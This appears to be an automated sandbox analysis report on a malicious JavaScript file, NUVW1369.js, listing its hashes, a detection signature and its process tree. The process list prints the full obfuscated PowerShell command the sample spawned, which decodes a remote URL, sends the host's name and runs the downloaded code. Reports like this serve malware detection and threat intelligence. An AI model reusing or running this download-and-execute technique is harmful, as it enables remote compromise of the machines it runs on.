Analysis
max time kernel: 401s
max time network: 403s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 26/05/2023, 16:31
Static task: static1
Behavioral task: behavioral1
  Sample: NUVW1369.js
  Resource: win10-20230220-en
Behavioral task: behavioral2
  Sample: NUVW1369.js
  Resource: win7-20230220-en
Behavioral task: behavioral3
  Sample: NUVW1369.js
  Resource: win10v2004-20230220-en
General
Target: NUVW1369.js
Size: 747KB
MD5: 7cf38440c1bab5520f29ea4f50ec50c1
SHA1: 93ba640988fc04fda650ed22861460bb4a8a4768
SHA256: b535dc0e3da92ff7112c9d6b8e49ed32f826554343bd16ea0b32599ee5b5c4ae
SHA512: a1493b99043bc2351b1caa470f6509b7b5a88a1d3b0456917548a36882ac6603fd2e346e4869af63766abf195221601c9f2bde92f81270170098f3f809bebd22
SSDEEP: 3072:yTXYmBNLkwZRnXAjoxS7wCXde+pj/uzLLLNQaAapwxDY/YhNkskLJ9KR9CHccVoZ:GyWbCpN4U
Malware Config
Signatures
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 1328
  pid_target: 2012
  Process: conhost.exe
  procid_target: 28
Processes
C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\NUVW1369.js
  PID: 2040
C:\Windows\system32\conhost.exe
  Command line: conhost --headless powershell @(2554,2566,2566,2562,2508,2497,2497,2565,2550,2552,2568,2565,2496,2566,2561,2562,2497,2564,2566,2496,2562,2554,2562,2513,2555,2511)|foreach{$ofebnw=$ofebnw+[char]($_-2450)};$rplotc='l';new-alias tfyfx cur$rplotc;$sibz=$(hostname);.$([char](7892-7787)+'ex')(tfyfx -useb "$ofebnw$sibz")
  Signature: Process spawned unexpected child process
  PID: 1328